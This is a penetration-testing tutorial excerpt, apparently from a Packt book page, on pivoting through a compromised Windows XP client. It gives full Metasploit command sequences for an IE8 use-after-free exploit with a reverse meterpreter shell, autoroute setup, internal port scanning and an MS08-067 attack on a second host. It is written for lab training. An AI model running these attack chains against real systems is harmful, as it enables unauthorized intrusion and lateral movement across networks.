Using the client as a pivot point

Exclusive offer: get 50% off this eBook here
Building Virtual Pentesting Labs for Advanced Penetration Testing

Building Virtual Pentesting Labs for Advanced Penetration Testing — Save 50%

Build intricate virtual architecture to practice any penetration testing technique virtually with this book and ebook

$35.99    $18.00
by Kevin Cardwell | June 2014 | Networking & Telephony Open Source

This article is written by Kevin Cardwell, the author of the Building Virtual Pentesting Labs for Advanced Penetration Testing book. This article is about using the client as a pivot point.

When we compromise a machine, the next thing we want to do is use the client source to our advantage. This is because we know most networks are configured with the locations that are inside the network architecture being considered at a higher level of trust and not with a location that is outside the network. We refer to this as pivoting.

(For more resources related to this topic, see here.)

Pivoting

To set our potential pivot point, we first need to exploit a machine. Then we need to check for a second network card in the machine that is connected to another network, which we cannot reach without using the machine that we exploit. As an example, we will use three machines with the Kali Linux machine as the attacker, a Windows XP machine as the first victim, and a Windows Server 2003 machine the second victim. The scenario is that we get a client to go to our malicious site, and we use an exploit called Use after free against Microsoft Internet Explorer. This type of exploit has continued to plague the product for a number of revisions. An example of this is shown in the following screenshot from the Exploit DB website:

The exploit listed at the top of the list is one that is against Internet Explorer 9. As an example, we will target the exploit that is against Internet Explorer 8; the concept of the attack is the same. In simple terms, Internet Explorer developers continue to make the mistake of not cleaning up memory after it is allocated.

Start up your metasploit tool by entering msfconsole. Once the console has come up, enter search cve-2013-1347 to search for the exploit. An example of the results of the search is shown in the following screenshot:

One concern is that it is rated as good, but we like to find ratings of excellent or better when we select our exploits. For our purposes, we will see whether we can make it work. Of course, there is always a chance we will not find what we need and have to make the choice to either write our own exploit or document it and move on with the testing.

For the example we use here, the Kali machine is 192.168.177.170, and it is what we set our LHOST to. For your purposes, you will have to use the Kali address that you have. We will enter the following commands in the metasploit window:

use exploit/windows/browser/ie_cgenericelement_uaf set SRVHOST 192.168.177.170 set LHOST 192.168.177.170 set PAYLOAD windows/meterpreter/reverse_tcp exploit

An example of the results of the preceding command is shown in the following screenshot:

As the previous screenshot shows, we now have the URL that we need to get the user to access. For our purposes, we will just copy and paste it in Internet Explorer 8, which is running on the Windows XP Service Pack 3 machine. Once we have pasted it, we may need to refresh the browser a couple of times to get the payload to work; however, in real life, we get just one chance, so select your exploits carefully so that one click by the victim does the intended work. Hence, to be a successful tester, a lot of practice and knowledge about the various exploits is of the utmost importance. An example of what you should see once the exploit is complete and your session is created is shown in the following screenshot:

Screen showing an example of what you should see once the exploit is complete and your session is created (the cropped text is not important)

We now have a shell on the machine, and we want to check whether it is dual-homed. In the Meterpreter shell, enter ipconfig to see whether the machine you have exploited has a second network card. An example of the machine we exploited is shown in the following screenshot:

As the previous screenshot shows, we are in luck. We have a second network card connected and another network for us to explore, so let us do that now. The first thing we have to do is set the shell up to route to our newly found network. This is another reason why we chose the Meterpreter shell, it provides us with the capability to set the route up. In the shell, enter run autoroute –s 10.2.0.0/24 to set a route up to our 10 network. Once the command is complete, we will view our routing table and enter run autoroute –p to display the routing table. An example of this is shown in the following screenshot:

As the previous screenshot shows, we now have a route to our 10 network via session 1. So, now it is time to see what is on our 10 network. Next, we will add a background to our session 1; press the Ctrl+ Z to background the session. We will use the scan capability from within our metasploit tool. Enter the following commands:

use auxiliary/scanner/portscan/tcp set RHOSTS 10.2.0.0/24 set PORTS 139,445 set THREADS 50 run

The port scanner is not very efficient, and the scan will take some time to complete. You can elect to use the Nmap scanner directly in metasploit. Enter nmap –sP 10.2.0.0/24. Once you have identified the live systems, conduct the scanning methodology against the targets. For our example here, we have our target located at 10.2.0.149.

An example of the results for this scan is shown in the following screenshot:

We now have a target, and we could use a number of methods we covered earlier against it. For our purposes here, we will see whether we can exploit the target using the famous MS08-067 Service Server buffer overflow. In the metasploit window, set the session in the background and enter the following commands:

use exploit/windows/smb/ms08_067_netapi set RHOST 10.2.0.149 set PAYLOAD windows/meterpreter/bind_tcp exploit

If all goes well, you should see a shell open on the machine. When it does, enter ipconfig to view the network configuration on the machine. From here, it is just a matter of carrying out the process that we followed before, and if you find another dual-homed machine, then you can make another pivot and continue. An example of the results is shown in the following screenshot:

As the previous screenshot shows, the pivot was successful, and we now have another session open within metasploit. This is reflected with the Local Pipe | Remote Pipe reference. Once you complete reviewing the information, enter sessions to display the information for the sessions. An example of this result is shown in the following screenshot:

Summary

In this article, we looked at the powerful technique of establishing a pivot point from a client.

Resources for Article:


Further resources on this subject:


Building Virtual Pentesting Labs for Advanced Penetration Testing Build intricate virtual architecture to practice any penetration testing technique virtually with this book and ebook
Published: June 2014
eBook Price: $35.99
Book Price: $59.99
See more
Select your format and quantity:

About the Author :


Kevin Cardwell

Kevin Cardwell currently works as a freelance consultant and provides consulting services for companies all over the world. He developed the Strategy and Training Development Plan for the first Government CERT in the country of Oman and developed the team to man the first Commercial Security Operations Center there. He has worked extensively with banks and financial institutions throughout the Middle East, Africa, Europe, and the UK. He currently provides consultancy services to commercial companies, governments, major banks, and financial institutions across the globe. He is the author of the book Backtrack – Testing Wireless Network Security, Packt Publishing.

Books From Packt


 Learning Pentesting for Android Devices
Learning Pentesting for Android Devices

Penetration Testing with BackBox
Penetration Testing with BackBox

 Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security Guide
Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security Guide

 BackTrack 4: Assuring Security by Penetration Testing
BackTrack 4: Assuring Security by Penetration Testing

Mastering Kali Linux for Advanced Penetration Testing
Mastering Kali Linux for Advanced Penetration Testing

 Metasploit Penetration Testing Cookbook, Second Edition
Metasploit Penetration Testing Cookbook, Second Edition

BackTrack 5 Wireless Penetration Testing Beginner’s Guide
BackTrack 5 Wireless Penetration Testing Beginner’s Guide

 SAP ABAP Advanced Cookbook
SAP ABAP Advanced Cookbook


Code Download and Errata
Packt Anytime, Anywhere
Register Books
Print Upgrades
eBook Downloads
Video Support
Contact Us
Awards Voting Nominations Previous Winners
Judges Open Source CMS Hall Of Fame CMS Most Promising Open Source Project Open Source E-Commerce Applications Open Source JavaScript Library Open Source Graphics Software
Resources
Open Source CMS Hall Of Fame CMS Most Promising Open Source Project Open Source E-Commerce Applications Open Source JavaScript Library Open Source Graphics Software